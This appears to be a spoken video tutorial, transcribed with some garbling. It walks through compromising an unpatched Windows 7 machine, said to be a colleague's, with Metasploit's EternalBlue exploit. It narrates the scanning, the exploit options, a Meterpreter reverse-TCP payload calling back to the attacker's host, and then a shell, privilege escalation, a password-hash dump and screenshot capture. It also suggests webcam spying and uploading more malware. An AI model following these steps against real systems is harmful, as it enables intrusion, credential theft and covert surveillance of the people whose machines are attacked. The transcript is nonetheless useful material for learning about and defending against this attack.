Thank you very much, ladies and gentlemen. Today I would like to show you guys how to get into the computer and then try to exploit the vulnerability that existed since 2017 with Metasploit framework using the exploit like Eternal Blue Double Pulsar. So this exploit was shown by the shadow brokers since 2017, but currently there are still companies, there are still people who are still using this type of operating system without even patching it. But currently Microsoft has patched that vulnerability. You can see it on their website. They have maybe plus or minus 2 years after patching this, but even currently we still have such machines in the companies. Some people can be my witnesses that in their companies there are still machines that there are still people who are lazy to upgrade their operating systems, basically Windows users, because they say Windows sometimes has the problems after upgrading it. But I advise people to be able to upgrade their operating systems. But without even talking too much, let us try to penetration test the machine that I am about to choose here. We can get the machines like NetDiscover, and then so we are still waiting for NetDiscover to get the list of the machines so that we can get to the one that I've seen on my network that it has that problem. So it says we shall be seeing whether this machine is currently online, and no problem. Because we are going to use Metasploit framework, let us start the PostgreSQL start. Okay, now let's start MSF console. Then let's pass this parameter so that I cannot get the banner. So we shall be okay. Right now we are going to target this machine and then see what is going on. This is the physical machine, it's not actually the virtual machine, as you can see. So now we shall be taking this machine with Nmap. Let's try Nmap. So we shall be seeing, we're trying to fingerprint this. Remember, this is my network, and legal disclaimer here is I'm not responsible for anything that you do with this, and should you use it on the network that does not belong to you, and you will end up in jail and you shall rot in jail. So please, I just beseech people, do not use this skill to an extent that it will get you into the pillar of fire. So right now we're still waiting for Nmap to finish scanning this machine. Thereafter we shall be seeing some. Okay, we can close this. We can close this. Alright, so we can clear because we have found the machine that we want. So now we are trying, after scanning in network, thank you very much God, and we can see, we can identify the vulnerabilities here, or we can try to enumerate to see what is going on this machine. So now you can see the open ports is 135, and we also have 139 and 445, which is the port that we want to test the service, whether the service is vulnerable or not. So now we have to try to enumerate, because our fingerprinting gave us that this might be either brilliant hypothetical guesses gave us that it is Microsoft Windows, but actually we also have the host name, we also have the service specs and the actual build and the architecture of the operating system, as well as then we have many things. We have even system date and SMB version 2, and then from the exploit database, then you can see what are the problems with SMB2. And then now that we have opened the Metasploit framework, let us try to scan with MSF or MS17 so that we can be able to see whether this host might be vulnerable or not. So let's search SMB. Yes, so we have this many search results. As far as we don't need exploits, we need auxiliary scanner, SMB. Okay, we can use this. Then you see auxiliary scanner, SMB. So to make work easier here, what I can do is use then SM, then when you press tab, then you get this. So all the SMB that I want is this one, and it is the script that will scan for me whether this machine is vulnerable to this method of attack. So we have options. Let's try to set our hosts 192.168.88.11, then set our port 445. Then let's try to run this scanner so we can see, okay, right, this host is likely vulnerable to MS17. It's Windows 7 Ultimate build 7600, and then it's 64-bit operating system. That means we actually have some good news. So now let's try to use to search Eternal Blue. All right, so because we know that now we are going to use exploit Eternal Blue, because it is a very nice exploit that people have been saying that okay, right, let's try to clear this. Okay, sorry. Okay, so clear, and then let's see the options that we have on this framework. All right, so we have this okay, set our hosts 192.168.88.11, then set payload. We need to send a certain payload to this machine, but we are not sending this as a virus, but we are trying to exploit a certain process that taking on that we have seen through the service port 445. So now let's say it's Windows, because it's 64-bit. And then we have Metapreter, and reverse TCP. Then we have this set port to 445. Then we have let's try to show options. Okay, now we have the lhost. Okay, now if config, then we 110. Okay, set lhost 192.168.88.110. Then let's try to run so we can see what is the problem. So now we are still waiting for the exploit to be able to take place. Let's see. Okay, now we are in. So we are in this machine, and remember, we did not send anything except corrupting sending egg to corrupted connection. So now we can see info. All right, this is my colleague's computer, so please not take me with some left. So what we can do, because we've gained Metapreter, then we can do whatsoever we want right now. So let's shell. Okay, so now we have gained the shell. Then it says we can cd, because this is now Windows. So this is what you can do. And let's okay, now that we are in Metapreter, then you can webcam snap stream, can webcam stream, can steal a camera, we can steal anything, you can download information, you can upload more virus, you can do whatsoever you want after you gain the Metapreter shell. Reverse shell, yes, it's a Metapreter reverse shell. So now that, because there is no somebody in that room, in that office, so there is no person before that machine, but otherwise this is how you can use exploit like Eternal Blue to hack the machines like that one I'm still hacking. So now we can also screenshot. You can screenshot that. You can screenshot screenshot, so you can see that actually there is no somebody here. We have root, and then we have a VV whatsoever name. So let's try to see what is it on the screen, because the machine does not have somebody who's still using it. So because so here we go. But even though you can see that this machine is now compromised, fully compromised, because if I'm the person who, yes, this is the machine. So if I want to do some further exploitations like hash dump, I mean like get system, yes, God system fire technical one, then this means I'm an administrator here. So who are me? Okay, because I'm now in the, I've forgotten that this is no longer Linux. So but because now we can hash dump, then we have got everything here. We got the password hashes, so if you can reverse this hash, then you can get exactly what the password is. So because you can do whatsoever, you can go to the databases, you can do whatsoever you want after you have compromised the machine like I did. So thank you very much for watching, guys, and God bless you, because it's Sunday. So thank you very much.